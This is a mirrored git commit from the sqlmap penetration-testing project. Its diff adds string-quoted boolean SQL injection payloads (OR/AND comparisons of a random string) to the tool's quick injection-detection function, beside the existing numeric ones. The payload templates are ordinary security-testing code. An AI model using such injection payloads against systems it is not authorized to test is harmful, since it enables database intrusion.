mirror of
				https://github.com/sqlmapproject/sqlmap.git
				synced 2025-10-26 21:51:12 +03:00 
			
		
		
		
	minor update
This commit is contained in:
		
							parent
							
								
									d19a8d53e4
								
							
						
					
					
						commit
						5860b8942f
					
				|  | @ -492,13 +492,23 @@ def simpletonCheckSqlInjection(place, parameter, value): | ||||||
| 
 | 
 | ||||||
|     result = False |     result = False | ||||||
|     randInt = randomInt() |     randInt = randomInt() | ||||||
|  |     randStr = randomStr() | ||||||
|  | 
 | ||||||
|  |     if value.isdigit(): | ||||||
|         payload = "%s OR %d>%d" % (value, randInt, randInt+1) |         payload = "%s OR %d>%d" % (value, randInt, randInt+1) | ||||||
|  |     else: | ||||||
|  |         payload = "%s' OR '%s'!='%s" % (value, randStr, randStr) | ||||||
|  | 
 | ||||||
|     payload = agent.payload(place, parameter, value, payload) |     payload = agent.payload(place, parameter, value, payload) | ||||||
|     firstPage, _ = Request.queryPage(payload, place, content=True, raise404=False) |     firstPage, _ = Request.queryPage(payload, place, content=True, raise404=False) | ||||||
| 
 | 
 | ||||||
|     if not (wasLastRequestDBMSError() or wasLastRequestHTTPError()): |     if not (wasLastRequestDBMSError() or wasLastRequestHTTPError()): | ||||||
|         if getComparePageRatio(kb.originalPage, firstPage, filtered=True) > CONSTANT_RATIO: |         if getComparePageRatio(kb.originalPage, firstPage, filtered=True) > CONSTANT_RATIO: | ||||||
|  |             if value.isdigit(): | ||||||
|                 payload = "%s AND %d>%d" % (value, randInt, randInt+1) |                 payload = "%s AND %d>%d" % (value, randInt, randInt+1) | ||||||
|  |             else: | ||||||
|  |                 payload = "%s' AND '%s'!='%s" % (value, randStr, randStr) | ||||||
|  | 
 | ||||||
|             payload = agent.payload(place, parameter, value, payload) |             payload = agent.payload(place, parameter, value, payload) | ||||||
|             secondPage, _ = Request.queryPage(payload, place, content=True, raise404=False) |             secondPage, _ = Request.queryPage(payload, place, content=True, raise404=False) | ||||||
|             result = getComparePageRatio(firstPage, secondPage, filtered=True) <= CONSTANT_RATIO |             result = getComparePageRatio(firstPage, secondPage, filtered=True) <= CONSTANT_RATIO | ||||||
|  |  | ||||||
		Loading…
	
		Reference in New Issue
	
	Block a user